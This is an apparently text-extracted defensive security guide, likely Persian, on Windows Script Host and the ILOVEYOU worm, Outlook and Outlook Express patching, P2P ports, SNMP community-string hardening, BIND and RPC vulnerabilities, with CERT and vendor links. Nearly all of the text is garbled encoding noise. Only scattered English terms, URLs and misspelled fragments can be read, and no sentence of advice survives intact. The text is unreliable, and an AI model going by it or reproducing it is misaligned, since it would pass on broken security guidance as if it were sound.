6VBScript 2 1 ) ) "), ) , - 56{† "), ) N I ], 0_ # ) #1 - 56 ') # 5/ ) K f4 * K "), ) % ! $"), ) ) # 6 4 ?# $ - 6, " - Y ZF J)WSh ( ) X ! B % ! $ILOVEYOU ] -,< < , VBScript 7 b M ,6 % I 0, , 3 c ‰ : ?@ " U 4 3 O * WSH % '\ & " wsf.vbs,.vbe,js,jse OG 0 6 '$ ) $() * "), )NT "), ) 2 3@ 6 <R ? 1 K6( F ? # $S ) i: - TJ) ) l '( _ 0, 2 , 0, - 5 - Y # ? ! Jscript 6" E +, WSH n 9 " * B ;! ) 7 $IE ) , $_, G f4 * ] SL {Š ) ME,98,98SE,2000,XP ) WSH,2003 0 ' 0 Windows Scrpt SL e 'j 4 7 h @ " ? Windows Download Script0 5 - Y + ! ". /0(123& -,< SL IE5.5 * - 56 NT ) {Š "), ) ? @ ) K6 • 0 -,< SL pqqs ) XP $ME ${† "), ) ? @ ) 0 WSH # W L3 0 $, <P -, < T ("c ("c : K6 WSH A) " - Y DY/ I : 2 ?@ K6 ' ) SL 0 < ,6 3 )(E #6 • ) HS @e G -,< SL ? @ ) " $,< ,6 3 - < ? @ ,G j* K6 - Y $?@ % ! " %& $ 456 123& , 7 B 5! ) 6 " - Y , " WSH 0,< , 6 3 F T#< 3 $l '% l' 6 ? 2 & * BWSH - < # 2 4 MR/ ) ? 5 TG' g 7 ("c , )- „ 1 # WSH ? 59 T G' g ? ) MR / $ 6 bP %K )- ) " ,G ) 785/ % WSH 5 " ) ?@ "), ) % ! ?@ DY/ #B 5! 
" I # 3 3 * $ N ?), ) $ ] 40 5 TG' g l '% 4$ 0_,< Noscript.exe b 8 $ WSH 6h8 % '( Wscript.exe ) Cscript.exe 6, BShell\Open2\ Command E 6 6 ^ -,< K $ Sysmantec U ) # 5 SL F W L3 I ("c ) Shell/Open/Command $ N 4 $S 0, < , 6 3 ( E $? @ Noscript.exea K5 TP Y 2 , 0, 5 ) P Q M , 6 " I' " Noscript.exe $ Norton Script Disabler/Enabler ) TG'] WSH GX) 2 3@ Z F " U 4• F #B 5! W 6A" L3 ("c 4Desktop K6% '] # wsf0.vbs,vbe,js,jse, $ OG 6% '] - ?# ? 6 -, < ( E # $-, < < N 4) - j 5 6 '?@ ? 5 TG' g , DY/ $ 5 %K I 6% ' "), ) e 'j 4 , #4)75I j 5 6 2 6% ' u . 3 , ) " ? 59 " U 4 , '? - .0 EXE u_ ) COM ) _ 0, < , 6 3 Z F ? @ B '8 ("c ? 59 0 5 6 '$" E F% # F "), ) e 'j 4 FWSH ?,< TG'(,! W L3 # WSH ( E ) 7 , , ? 5 m .1 6% ' ^ P "), ) K F ) / % '?, < T G'" U 4 ,6 3 - _ < _(WSH ^ OG • ' ] Noscript 0 ) T G' g " %/ Symantec ) T G'? # $_TG' g u I ? g MR/ 6 # % '$ # $S 2, 0,< K6 # 0 -, < T "E ? 0 5 d* 0, 5 •* T /2 ! ) ), . $, # WSH ? 6 6 ! $2 ?@ F W L3 ("c 5L S @), , G I 2, 0 < , 6 3 @? ! Z F ?# ? `56$ ) / % '( csript.exe # 0 wscript.exe )= G Cscript.exe myscript.vbs ? 5 TG' g ) MR/ - . : 7 !89 S WSH I h @" ? http//www.symantec.com/avcenter/venc/data/win.script.hosting.html 0 5 - Y ,` :&" -, < ( N U ) ) ? 5 TG' g ^P I 3 $l ' 6 &'( O * 6% ' I ] 0 6 # ( E WSH0, 5 b -, < K 6( $S 6% ) / K5 X , < .scr.vbs,js,jse, wsf,bat, Script Blocking 4gatways U ) SL $? & ) ? , 6 WSH ? -)8! ] ("c @ $ 2, _ 4" - Y # ) #1 6 ) 6h ) )exe pif and 8Q _Norton AntiVirus 2001 ? # $, G C P 6h) ) % ? & , K DY/ a; [ ,Z 2(2 + WSH " ? QS $ ?@ * 2 3@ 0 h @Windows Script Download0 5 'Z 7 G', $ 3 ? 1 ' + , 2R NTFS 6" E " NTFS h wscript.exe ) jscript.exe % H ? i: = G " K6-) )? I ? ^P 9 - 56account V < % ' ) # % ' ) " 0 5 - Y $"), ) PG e 'j 4 7 5 I $ < 6% ') 6 Full Control -) $‰8 W L3 l 'e ) Everyone $, < ? ? 5 $S 2, 0 < ("c " E 'j 4 7 5 I 0, < $ 6 0, , + : uNTFS 6" E TP 5 % < ' I 25 0, < 5 S K6-) )? 
) X " %/ $ ) 6% 'MR / ) T wscript.exe ) cscript.exe MR/ % < 6 ,1') 6% ' " I <R V < <R NTFS e 'j 4 7 5 I $ < 7 6 % ' ) ^P a K5 25 , LH B' ) O * $My Computer ? 5 TG'• $ 0,< _% '$ $ u , LH ] -,< O * 0 K5 d* 9 -) $?, 3] " E L3 Y. O* tab 7 (,! Deny ) ?# Allow % ' Property $ ?& % ,P % ' I ) $ NTFS convert drive_letter:/fs:ntfs 6" E NTFSah @ " ? bP \ $Pemission j* 0, 5 # Security j * F) ?@ ) ^P .Y F) ?@ " Property Y. ? 5 TG'• < ^ Account $d I < 5 -,6 " ? I - . W L3 % ' ) d* 6" E • & 0 K5 _000 ) 2 < Security $% ' ^ NTFS 0 • -, , #4 $ Convert ] 0 5 - Y 7 !89 S I5 $ http//www.microsoft.com/windows2000/en/server/iis/htm/core/iidfp sc.htm 0 5 - Y ! " % &# 0, Outlook Express, Outlook Microsoft Outlook 7 !89 $l ' 0 ') # $ 6h 5 b $_U '@ -,< K , ?# $ # ) #1 ^P 7 0, 5 Exchange ) K 4" K $ K6 0, < "2 -, < K 0_ - ? &56 ‰: Outlook98 y SL 7 P # ) #1 0 I 5 6 BH ) - $ F !" V 8Q 0, < , 6 3 C A 0 ' ,6 3 3W 3 6% 4 H I W L3 ) ?N IE ^ - Y F 6* %/ - " 6 J) 0 - ,E - Y 9 ) U '@$ , ) T) , ) 1 ) < ,6 3 TP N P ?@ 6 - Y * ?), ] $: , " T#< ") =GX [ 7 F) 7 G ) - ), . ?@ " - Y Z ") B 5! b. , N : <2 C G:H 6j1 $2t5: ) 25 S * " - Y 0, < , 6 3 6 '& F =GX $W 3 L ! I $ 6 &'( SL ?# _ c $l ' # ) 3 $ ) rendenring 0, 5 6 ) H ? 5F * ?@ - 56 , 1 6 '$( '784 2 , G 7c L. ! ] 56${Š "), ) 'G ? " " ] ' ) # Outlook 98 IE - Y a? `56 P Q 4 -, 6 U ) =! > ?@ SL ? ! 4 " HTML 2 -)8! Server V < ? " $7 H8 IE - Yc j* 5 ? ! ) L*< 1 ) 7 ,3 K Backoffice „ 1 # " - Y ? # $"), ) % ! $ U) *] 6 c L. n YBIE ) OE I 4 -, 5/ 0 ) Express Outlook ] _OE Outlook K ! 5E " ? " ) 6 1G'Oulook " 4 l), F # ) #1 bP b 2, 5 $ 6 &'( 4 6 '& $_ ' ) # ("c 78 % , - 4$ ') # BH M ,6 " # 0 < ,6 3 T # ) #1 6 ) 7 !89 , , \X 2 )- $ # ) #1 6 0,< < TP O * &'( P 6h) ) 6@ & ? 5 About I n 9 " Help l' f4 " Outlook ? ! Z 0 , :3 ) 7 , , ") # ) #1 6 -, " * 2K4 0 ' 6 @ 6* 6N F e 'j 4 SL ] 0 ,G - 5< " ? ?) ' 6 BH 3" $IE ) F " U4 $IE TG' $ >! ? ! 
) ,< ,6 * SL Outlooka U) l ' &'( 6 K U '@- $?@ SL W L 3 _ -,< K "), )OE 0 B '8 0, < - 6T / " 5 - 56 -,< K " , ,F * -,< E +, 6* * G 6, ) 6( $() * OE e ) !89 6) $ , $ ,F ) 7 5L 6* Outlook9 • Outlook97 • _ < Y & Outlook2002 _ < & ? 5 TG' About * pqqq " a 5 - Y " ] Outlook 2000 • ) Outlook10 ?@ ] OutlookXP • n 9 " Help - 5< " ? OE 2K4 ! Y & Outlook9 ?@ 6* Patch + 0 ' 6@$ " ? !89 -http//www.microsoft.com/windows/oe/. -http//www.microsoft.com/office/ outlook./ + ! ". /0(123& F " U4 ] IE : ) 2 _ -,< SL 0, (N ) ) SL "), ) % ! 6 ?@ - 56 Outlook Express " * IE $U '@ 6 SL * " ,6 3 ,< ! 5E SL " - Y ( ,H ? Outlook -, < K ( N (,! 7 0, < H, , e G ?@ ) K6 0 -,< SL & 0 < ,6 3 HS @e G 0 5 OE )Outlook 6* 3W 3 $ 9 5 %K 75 I & A ! (,! # ) -,< SL 0 < ! " %& 456 123& "2 a (E F 7 , , j6 ) l ' R4 S @ % YB* 7 B 5! # Outlook + 6 " Outlokk Express e 'j 4 7 5 I ) SL Outlook ) Outlook Express 7 5 I W L3 4 DY/ I 5 ("c W L3 2 0, : 2 0 =GX 2t 5: -,< SL * ? (N " ) (E a SL ) http//windowsupdate.microsoft.com/ . ] Critecal C L 3 -,< K _ n 9 " Layout 0 6 , & O* 0_Preview] 6 'Show Preview Pene bP " 5 Security Zone] ) O * Options & ? 5 TG' g n 9" a,< : I " View 5#. 2 • 0 # ) #1 High I <b 2 " $7 !89 " 6 5 1 ) % 4 ? 5 T G' g • 0 < ' ? 6Patch / 7 5I ? 5 & Tools - Y • ) A" @ ) X? 25 , @ ' ^ P , # ) #1 6 " •0 % ! " - Y K ?@ j : ("c ? F $, < 2t5: ?@ -, T +P 6h) ) W L3 / $ 5 5X % ' ("c ' • ? " $?@ ? 5 TG'" %P H) , 0 <( E " g ] , 1' ? ! ? , 6h) ) " 6% ' " ("c $ 5 5 X % ' " ,G b ' 5 5X ' $l 'h @ ] 0 5 - 3•_MY Documents 6% 'S #Y ] 5 O* N _ ("c 0 < 3 # ) #1 XSL % <, 0,6 ' ) # " - Y macro Disable I 6% ' / ' F # 2 ,< % ' * 6, • ("c # High , & ) - < HS @),, e G 7c L. : 6% '? 5 T G'" • - 56 5 5 X ) DOC • ? " $_Word I] TG' 0 < ' ` :&" 6 !89 DY/ W L3 6 0, 5 DY/ " ? 59 " K $O * (N (N 7 B 5! $h) ) @ ' 4 h) ) @ ' 4 ) , ,F 6% '? 5 V8 " ? 59 4 0, < ) 6 -,6 # ) #1 6 ? , ?" h) h @" ? 
6 U) $O * Œ # ) @ 6 NY67 6 ) (E 5 j 4) @ ) 6h) ) " ) 5 5X @ 7 L 6 " - Y " %P H h) ) , Q% Q $7 , , 2 , ,F % 0, 6 )- 6 &'( L %H , / 6h) ) , , " %P H $Œ # n 9 " 6( @ ) 6h) ) $ 6( 6 I5 - ? @b 7 # $h) ) 6, I 5 0, BH $ P DY/ 6 & $ " ,G 0, 6% '7 L +F )O * , % < (N # ) #1Preview $ I 5 0, $ ' http://www.microsoft.com/security/protect/antivirus.asp0 5 - Y A ) # QS $Outlook + Express OutlookG Outlook Express j &'M,6 ] $l ' * " 2 3@ ' I 5 0_ c g] , 1' ?@ , ? G 6h) ) " " / ) N 6% ' ' 7 G', ' 3 2 _ O* 6% 'S #Y] F \) < : 5 O* N ) DOC 0,6 ' ) # macro Disable ) 6% ' / 0 - < " - Y ' ,< % ' * 6, • ("c # High , & F # 2 HS @),, e G 7c L. < - 56 5 5 X % '? 5 T G'" • # ) #1 XSL % <, • ? " 0_ ("c 0 < 9 l 'h @] 0 5 - 3•My Documents ,G b 5 5X 3 ?1 5 ) 6 BH ("c 5 X % ' , 1'? " 'Z _Word I] T G' 0 < ' ` 6 DY/ W L3 !89 6 , 5 (N (N 7 B 5! h) ) @ ' 4 h) ) @ ' 4 ) , ,F 6% '? 5 V8 " ? 59 4 0, < $ ) -,6 6, I 5 0, BH 6 # h) ) K $O * DY/ " ? 59 " P ? @b U) ? " $O * @ 6 6 # ) #1 6 ? , h) ) I # +F , :&" 6 &'( ) 6h) ) $ 6( NY67 6 6 ) (E 6 ) 6h) ) " I 7 L 5 j 4) , , " %PH $ ) 55X @ Q 7 , , 2 , ,F % 0, 6 )- Q% L %H , / 6h) ) " - Y " %P H h) ) n 9 " 6( @ I # @ )O * , % < DY/ 6 & 0 " ,G 0, 6% '7 0, A L (N # ) #1 $Preview . http://www.microsoft.com/security h @ " ? $ ' ) # 0 5 - Y /protect/antivirvirus.asp Outlook Express M, 6 ] 'Z " ? 7 G', $l ' " ? 59 * ' I 5 0_ c U '@ 6 )d * 7 L l' . 7 K &F " 6 @ I XP Security h @ " ? # 7 u ) Outlook ? 4 (N 5 ("c 0 5 - Y white paper Office # 2 $,< #P< ? , 0 < -, " Outlook ) X ) ("c " bP 7 5 I ) 6T5! " %P H I5 , ( N6 0 5 - Y Offece Product 0, 5 $XP U '@ * - < ) 5 ) 6 BH j &' http://www.microsoft.com/windows/oe h @ I5 0 5 - Y Updates page h @ " ? ^ QS $ 9 Outlook Express 3 ?1 2 3@ Outlook + " * 5< , \89 # ) #1 6 " ( N6 ^ \X $ 7 K &F <@ 0, 5 - Y Resource Kit Office Outlook Express U) 6 ) # ) #1 6 ? 5 Uninstall I N W 3 ( ,H ? $ ? "), ) 6* ) 0 5 ? ME Setup - Y 7 !89 , -, • Outlook SL 7 ? 
5 Add/Remove Program • Outlook ExpressSL 7 ) {† "), ) ) O * ) Windows " # ) " Outlook Express ) Outlook a 5 & " - Y Outlook ? 2 &Uninstall & ) Add/Remove Progtam ? # @ O * 0 5 6 ' ?@ MR/ ?# Outlook Express ? XP a 5 - Y • Outlook Express SL 7 ) pqqq "), ) ) " 6h @ " 9 7 B 5! , `4 F Outlook Express Version 5. X/6.0 * h @" , - Y , " pqqq "), ) ? 5 … - Y http://support.microsoft.com/default.aspx?scid=kbEN-Usq263837 0, 5 Outlook Express Version 5.x/6.0 * h @" , - Y $, " ME 5 ) {† "), ) ? … - Y http://support.microsoft.com/default.aspx?scid=kbEN-Usq256219 0, 5 R4 S @ : 2 5 Wimdows Peer to Peer File Sharing (P2P) 6 ' ?# 2 ) 0, < ' User mode I " , H- Y ' $ K, ) " ]- 2 l' 6 h -, " - 3• >' I 4 -, ? G? , 6- I N 6 #P< " % ' ' ? , ) SB g -,< K 7 < & ? " ) +" 0, 5 ) 6' )d* < 3 )V# $ 6% 'V < 2, U) ? N - Y Q " - Y H? , I5 l ' 6 code Source Napster b 6 9P T " \ 2 - Y _ /) 6 , 5 6 2 H U) 6 +" ) Download )Y \ 5 <2 I 3 ?1 7 L SB g l' 6 " I ! B B 512 U) ?# 1 &5 ) ,< d l ' R4 S @ : 6 n 9 " -, < 1P 0, 5 ( 7) Y -,< - < ^ P ) -, 0 E F 6- E F U) I &' 6% ' , )- ? 0, R V < 6% 'T )?@ download 2 , 7 5 „ 1# 2 LAN ,63 L ? 6 F 1 ), 5 ) 5 0 5 ' $ 6% 'T F) & WAN 6 H ,F , , ) S @ e G (E U) '/ < \ N 7 4" - Y K - 1% I l' \P < ?# W 3 6 P2P ) (E 6% < , 67 4 " X / I5 ?@ http wrappers " - Y " - Y ) E F ^P 0,< ( ,H ? " ?56 - Y e 'j 4 I ), . ("c 78 I ^P , @ ' <] -, I 0 ' , 6 3 -, 6 #P< 0 < ,6 3 % < I _-, Q 0, < ) 6 ' E F 0, 5 upload 2 , l ' 6 -, < T 5! 3 ? &56 : , . 2' T/ v 4 6 6 ? " i: multithread / ) j &' " - Y ? " 5 "E g DOS \ " 85/ ;! , ) _P2P -, U) 7 !89 23 , - 9 * F) 0 < <R V < ,F : < _… ) F) & ^ 6 &'( $ \X ] L $ 2 , #4 : _ % < P2P $ " ]& B'\ l '7 , , 0 ' =GX % 1 , ] #P< ),. H %K N` 6] : 2 0 ] 7c L. -, 6 K 6 n 9 " -,< K 6 \ 2 " ? , . 6 _ , <b . TP - Y )_ ) B' 0, 5 F $() * % ! _0 F 6* 5 -, < < "), ) ) F) & U 1) U# ^P SL % ! P2P ? I5 6 +, ,G ^ 0, < 3 W 3 j1 #P < ) 5 - Y "), ) 6* : ,, 2 e G P2P a " \ 2 b -, < - Y T) , 2 P 1 & ?@) < ! ". 
0(123& 6 " - Y d * 4 4 ) " 6* ] + ,6 3 TP, 6 " : #P< ' y 2 < • 6 6 b C 5! application layer strings ' E F• - Y P2P 0 -, < download . T I #P< " - 3• 6? # _exe, mp3, wma, avi, mpg, mpeg, jpg, gif, zip 0 "@ 'D j6 #P < " - 3•Z>'y ! " %& (E )Y 7 B 5! 6% '] $l ' R 4 S @ : % • b • 456 123& DY/ I 5 a ? " ? H ) dowmloading 6 ^P | < " - Y • T G ? " ? " g 6 " - Y - . . #P< 6- N ^P " - Y • T G ) #P< " • - 3• >' 5 0" E ;N8 6 &'( C L3 &'( SL H 5 3 • 15G ? 0, < P2P T P2P 6 b I ) 4 -, 6 U ) " - Y • -,< - Y 67 4 _ ) ) | F) 3] y P2P ^P ' 0-,< ( N h) ) -P2P + , B'• • C L3 #P <y @ 6 &'( " & \ 2(18 1 5 ") - Y • + ,C 2 _••{{ $††}Š $†††† - 5< TCP 67 4] Napsster • _‹••Š $‹••p $‹••w - 5< TCP 67 4] edonkey • •s‹} $•s‹• $•s‹Š - 5< TCP/ UDP 67 4] Gnutella • 6- 5 < TCP 7 4]Kazza • TCP/ UDP 7 4 ) www wp‹w - 5< ! " % &# , Simple Network Management Protocl (SNMP) -N 5 SNMP " - Y 784 2 ) , , #4) ) - " y #4 I 5 ?@ " # SB g $T 0 < 1 )$ I 5 SNMP %# ) 4 " - Y TCP/IP - Y P ' 4 #P < 7) Y 6 6( ' - ) 6Access point $ 6ˆ K $ 6 ) $ N4 ' 0 < SNMP , 6( 4 ^ 6N 3 2 ( 4TP B % , 6- N $SNMP -, < - Y b o F & $ SNMP N& S ^P % < 0_, 5 - Y ] #P< ) 3 $l '7 !89 " - Y Q 0, < R4 S @ ^ ? 5 SNMP u - 5< * $SNMP 0_, * L3 7 L _U ) 3 ,K B! " ,G b R4 S @ ^ < $h _?@ / X ! 6- ' ) !89 -,< %L 3 M,6nH ) S -,< K 6v 6( 4 , K " $SNMP * I5 j ,4 ] < TP, P " - Y 6N 6N O* H e 'j 4 7 L ? , 6T, " - Y - 5< * #4 PG ) , K R4 S @ ^ 3 , G ) T G' SNMP ,G " $SNMP ) ) ,1 " I5 7 K &F SNMP 6( 4 " < 0, < R4 S @ ^ , ) , ) 7 !89 Z ', 2 5F ) H $l ' R 4 S @ ^ - Y SNMP 3 785/ & c L. $ N #4? bP R4 S @ ^ 6* 5 i: j &' I 5 ? , 6N SNMP 6A) " - Y (,! 0, 5 ! N " $ #P < A) " [ P e 'j 4 A N 0,< 6 0, < 3 gV " PG ) , K (& # ) -,< 1P ^ P SNMP 5 , H ? G -, < & < ) 6 3 7 & E ) 7c@ 2< ] V ^ - Y 6A) 6( 4 6A) " [ 0_78# , 6A) 0, 5 -, < - Y , 6A) " $SNMP )Y " ] DOS \ " 7) Y 785/ ( E ? ' 0, < I5 $qs …pqqp CERT – h @ R4 S @ ^ 0 5 -,6 0 6N ! B 5F " $ 6( 4 " * ] SNMP - 5 _ - Y $ #P< y I 5 -,< - Y : I K 6N H , 5 6T, " - Y 6A) W L3 ,1 K ]0, < ("c , U) ? G SB g )0 2#5 #P< , 7c . 
A) SNMP0, < Point 6- N U 1) U# -, < d * 0 3 $UPS 6N ^ ) $ 6 N4 , 7) Y /f =GX % 1 , : 9P Bridges ) access % ! P 785/ &1@ " % #4 B5# I 5 -, < - Y SB g SNMP " 0 #P< 7 & E $ ) SNMP , , b ) Windows Service (&B SL 6* $SNMP 6 SL $ #P < ) 6 7) Y embedded e 'j 4 7 L $SNMP 5 TG'"), ) F 2 6* 0 < - Y 785/ Q 0 $() * * SL Q 0, < - & - 5 "), ) % ! +, 6* 5 T G') SL e 'j 4 7 L l 'U ) SNMP l ' R4 S @ : P 5 CP 0, -,< K W L* #P <% ! 6 0 < ,6 3 + $ #P< -, < % L ) F 5 $SNScan N 4 6N ) 0 5 - Y . Foundstone. http://www h @ n 9 " " - Y ? # # 0 SNMPZ F ) SL W L3 GF ? ^ % ! T G'd * -,6 ) " - Y SL ) "b 5 I5 A) " ? ) #5 ? ? <" 67 # n.7 a < ,6 3 - "2 Com/knowledge/free_tools.html ' $ 2 netstat w•p ) w•w ) ! ". /0(123& SNMP SL I 5 ("c 7 B 5! $SNMP " b3 ) 6- N H,, e G ?@ ? ("c 7, U# , 0 KF 0 (E ( E 2 6& 7 L - 4- ." )- @\X 4 ) F) N 4 6 @ " U4 (E 6U ) SNMP E F) 7 B 5! 2 netstat-an H,, )S @e G $SNMP -, < - Y ) e 'j 4 SNMP Community ] 13 F) _ P ! h,/ % H SNMP Community F) Community SNMP Y* F) 6 < ! " %& DY/ 7 ,H ? 0 5 ") 456 123& $l ' R4 S @ : % DY/ I 5 6, " -1 < $( ? ! "+ , I 5 $SNMPv3 ) 6( 4 , K 27 456 SNMP ? 5 TG' g ?@ " - Y 7 ) X (,! 7 P T, " - Y _?# 7 Patch * 2 3@ ? $? , $) ) , 1 7 L* " TCP/UDP w•w 7 , 4] , K5 0 K6 ),. agnt b ^ b agnt 6@ B' #P < (E 6 % ! SL $-, ) ) P $ ) 6- ,1 b 3 , ? & P A R 4 W L3 T ("c T P !89 y SNMP 3 3 6N " ? 6* B'T) ' " - Y 0 ? 5 V8 w•p 7 4 ) 2#5 l ' J) 0 $?@ " ,G ) pqqq"), ) 6 9 F) F 3 7 L l '7 B 5! ? 6 -,< K SNMP B SNMP agnt b 6 6 N& SNMP " - Y 7 * l '7 B 5! 0_TCP/UDP ) X # - Y SNMP agnt ] 6- $CERT Advisory CA-2002-03 5 5X j* 0 5 GF [ 6& ? G ? 1 ) $,< Q 0 (E ( E IPSEC & ?& B' ) 0 < +H ) ` 6 ?@ " - Y 7 ) X (,! 7 +, 8 456 SNMP ? 5 TG' g I 5 $SNMPv3 ) 6( 4 , K P T, " - Y _?# 7 W 3 " 2 0 ) ) 7 $) ) * SNMP " - Y 7 P! L )- h,/ % H g , O* 0, < )" @ W L3 3" ? N& 6& ? G -, < - Y ] community - Y _ ( #. ] 6- ("c : 2 0 I5 N u& ("c "W 3 P F 7 # " - Y (E P ! 6& $http://www.sans.org/resources/idfaq/snmp.php h @ 6 ),. -,< ' -, < K 0 b) w•w 7 B' #P< ) ) 6- l '7 B 5! 
0_TCP/UDP # #40 4], K5 (E $-, < & 5 $ , F) F 3 7 6subnet 2 SNMP " E ' B I & - Y SNMP 9 w•p 7 4 ) TCP/UDP L 6N , I5 C ' ) X y # B' , 0, 6 ( E Q I c2 ' R4 S @ ^ 2 U 1) U# !" 1 23 4 0, <P 7 !89 " ) 0 ) %K 25 : -, < =! > ?@ 56 $ 5B !C 8 ? , ) 5L M 9 A 'D (E ! 5E 2' /) F &1@ 6 GH ) 5 2' H? " ?@ P 4) " R4 S @ ^ 3W 3 P B 9 F) % 1 , ' ?5F ) - 5 - Y -,< 3 < $ 3 M ,6 % , , N ?# - ) 6? " & 5 ?5F ^ 2 " S @^ N &1@ ) S 6@, 5 D Y/ c ) [ 3_ O * 7 < \ R4 S @ ^ ) 6 Y/] ) X F 78# " V, ,G 6A) 2 , ,3 %K " 6 O * M,6? G Cod Red ) % ! 7 !89 ? @ > GP 8 $ B I 6 ? Q 6U ) 6 & $ ?5F 0, 5 ) 6( I RN6 2 #P < E ) 6 " - Y Z I N ) ! Y 785/ T) , % ! =GX ^ N` 6?), ) - # M 9 ( &@ I J 0 ,G 6 - 6 O* I 56$ % ! -") P % ! : ), F 7, , , - . 6; . " - " M 9" ) , < % ! @) &' * + # $% ! 6 R4 S @ < b R4 0, < ) U# R4 S @ ^ F) B !$ ) 2 R4 S @ ^ R4 S @ d * N 560 " ,< ,6 3 K 6 'G " U4 2 <) , , e G % ! $ R4 S @ ^ " 6% c 3 6 ! 5E 4 63U $ 1 =GX N 4) B - . % ! 6 R4 S @ ^ -, " ) <@ ? @ ^ &1@ ) ! ? " F) " [ < )@ 785/ ) 7 , , SB g $, 6 '?5F #P <) F ? , " ) 4 , 1) $ - < ?@ R4 S @ ^ " % ! 6 S 0 3 =GX I bP G ) i: " - \ 785/ F -, 5! -) - -") K6 F - F , 5 - Y % ! U# R4 S @ ^ R4 S @ ^ ("c 6%5G1 % < B5# ) , Y 7 !89 ? F 2 5F ("c 7 ,H ) 6 I ;&2 - Y - ? F i: 0, 6 ( E ) - < b f ! "M &# ( $ % ! " , G 785/ ? ? G _7) Y 2 ? 6 # $U# 0 6 * ] U# $ -,< ( E - ) a- 5 BIND Domain Name System Remote Procedure Calls (RPC) Apache Web Server Generl UNIK Authentication Accounts with No passwork or weak passworde Clear Text Sevices Sendmail Simple Network Mangement Protocol (SNMP) Secure Shell (SSH) Miscon figuration of Enterprise Services NIS/NFS Open Secure Sockets Layer (SSL) BIND Domain Name System ) - $ (Berkeley Internet Name Domain) BIND &'( h - Y DNS_Domain Name ] " BIND 0 / 5 IP h @ _http://www.srco.ir/ a #P < \ " C L3 $ 785/ ( E ( E ?@ I5 S ^P 1 ) $, - - 4 # (E ? ,6U) M,6 0, < R4 S @ ^ ) -, , !" #4 DNS T# < ") BIND K6 j CA- CERT 785/ N " , 5 dOS \ K : l 'F 6v 4 T " 0 H ?@ -, ) - Y DNS ;! 
BIND -, 6 U ) Dos \ " F >/ 0, < R4 S @ ,G % Z #4) W ZF $ Dos \ " F B 5F " 0,< " F ! L3 ) X ", Cache < TP, ^ -, < = 7 K &F Advisory2002-15 H Overflow \ " 3 : Resolver + ^ ") < " - 4 F ) DNS 3 2 $ 3 7 K &F ", F) : 5F 2 6 ' l ' R 4 S @ : " - Y Z ?# $ - *1 , ,, 0 5 " ,G " 6 N ") 2 0,6 <R " R4 S @ ^ , CA -2002 -19 CERT Advisory 1 0 " F $ " $l '785/ K6 3 # 1 0 E ? & ) 9 785/ 5 $ 6% 'S : ? ' I5 ? , $ 5 ,H ) Buffer Overflow =GX ?@ ?5F < TP, , L Bind deamon ? @ ) l '% ?@ " - Y -,< ? G ? 5 M 9 ? , ("c 6 @ (, ! a, * 0 (, ! ) DNS U ) <8 BIND ? , )- F I5 785/ ) O * _Dos] Denila of Service ! 6U ) g7 % ,P I / - N F ) BIND " - Y ?@ 0, - I] ? & - 4 , R4 S @ O * /) N ?@ " ) - Y l ' GX) " ? 5F - Y @ , 6 6 @ ?), ) 1G' I 5 2 3 PG g 0 #P< 6- '784 ? G -, 6 U ) F " ?5F 0 R4 S @ - 5 U 2 , 0, 5 - 3O * ,6 3 BIND " SL ?@ ) * 1) U# Ž6, 6 U ) 1 & S - $() * , -, < K BIND " * # +, 6 ? G? & 5 C P , #47 0,< ,6 3 + ) ) K % ! BIND " - 5 6Patch 2 3@ " - Y K ? 59 BIND * ?@ " " - Y 7 SL BIND # 5 % S @ T5 / $,< -, Patch % , 6 3 j 5 X.Y.Z 7 Level Patch ) ?@ ) " ?@ ? )- , N 2 3@ " H 0 ) Z) * Symantes 6 @ -,< ( N N 4 - Y & $ I " ? R4 S @ ^ d * P 3 $ 0 < ,6 3 4 " BIND bP ) -,< F) R4 W L3 Y$ B -,6 X * N 4 2 3@ 0 5 SL # 5 2 ' ISC >! $ BIND 6-) 0 I 5 DNS R4 S @ ^ * 2 3@ $ 6, 6 6 ! " %& a / -,< SL BIND * F 6 #) " -,< 2 3@ SL " -, < K BIND * N ,1 b 0 5 % * 7 K &F -, 6, Version 9.2.2 v bP -,< SL X !] -, 5 ,H Q L ISCb ' )- 6 -, 6, $ 7 BIND # ^ : ? (N / ? 59 BIND * ("c 7 !89 v named a 0 3 * ( E _-, dInternet Sofward Consortium :ISC ! ". /0(123& % nH 456 123& DY/ I 5 ) • l89 & named ?@ ] BIND deamon ? 5 TG' g _ N 4 I 5 0, -, BIND &'( ' ? DNS -, 6 U ) I ? G _?@ ,E ? 5 TG' I ] W 3 7 K6 u 3 0 5 MR/ 6 )? , ,1 b 6Patch -, 6 U ) -,< K B5# 7 !89 ' 0, 6 Z Checklist j* ) CERT " * N (N 2 3@ " BIND -,< K 7c T5! " ) " • I5 ?@ ?# 7 2t 5: SL : 0, K5 - Y $ UNIX Security Banner ^ g * j 4 ) 785/ ? 5 BIND GH ) * - 5< -, ` 4 ) MR/ BIND " • I5 Version String 0, K5 2 &N F _ named DNS servers) % ' DNS [? 
, 6U) Zone 7c Zone 7c C ' T GH ) • ?# ? # _secondary DNS servers], K5 6 'Domain ^P Child ) Parent ^ P ? # " % ) T G' g 0, K5 - Y _Forwading] y #B 5! % DY/ 6 Domaion R )] Delegation ) ') _ 1t • glue fetching ) Recursion ? # I5 0, K5 TG' g DNS Cache i . 5 ? H . ) named" " - Y [ non – privilage : ? G BIND 2 Privilage h @ " BIND 9 - 5 < * DY/ , K5 ),. • I5 BIND $ Z F Chroot 0 0, K5 - Y http://www.losurs.org/docs/howto/Chroot-BIND.html h @ BIND -, < = R4 S @ ^ bP ) 3 785/ % DY/ I a 5 - Y h @ " ISC BIND 0 h @ " ISC 0 : Dos R 4S @ " ? : • - Y http//www.cert.org/advisories/CA-2002-15.html BIND - Y 9 "+ 8 : DoS R4S @ : 2, http://www.isc.org/products/BIND/bind-security.html • 6 ) BIND 25 SL I 5 ("c 7 4" - Y ) 6@ ) Running the BIND 9 DNS Server Securely a h @ " ? 0 5 - Y Afentis h @ $U c -,< K 7c <@ Remot Procedure Calls (RPC) K62 ) F H B 5! - N F F 0, < U) ( E K I " )- T n 9 " () ?@ " - Y RPC - Y NIS ) NFS % 'V < $ ) - " , I #P < -,< +" 6 ; G RPC ,G 6=GX F) 6U ) Q RP @ ? 5F RPC 6" E 6 " - Y T % ) ) 1999 T RPC ,G RPC " - Y 6 T) , I ?@ " f F )- T 5G ,/ " j 0, ) H"E @ =GX S DoS \ " 785/ Q R4 S @ : ) : %1 , $ # g F I F) & C 3 0 0, i: & @ ' )- y 6, -,< = - 785/ 8Q RPC \ ' 7 ") 6U ) RPC DCOM ;! "), ) ?@ ) U R4 S @ ^ - $() * -,< SL RPC F 2000 ^P : # ZF 3 M ,6 K6 - ( 2, , 0, < , 6 3 =GX 6 -,< YB* 785/ +, 1 ) 